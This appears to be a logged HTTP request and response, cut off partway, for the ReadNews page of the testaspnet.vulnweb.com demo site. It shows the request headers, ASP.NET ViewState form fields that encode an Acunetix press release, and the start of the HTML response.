Request Header - size: 464 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2 Content-Length: 10945 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 10,945 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc%2BQWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BNTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BRmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BJnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc%2BPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk%2BPGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk%2BIDwvdWw%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZCqQXr9Bo%2Bfii5vVAAhGyfGRVNk1&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLjj6S6DAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBJXwOObHp1dq30nemUavTDCszjxx
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 30642
Response Body - size: 30,642 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvb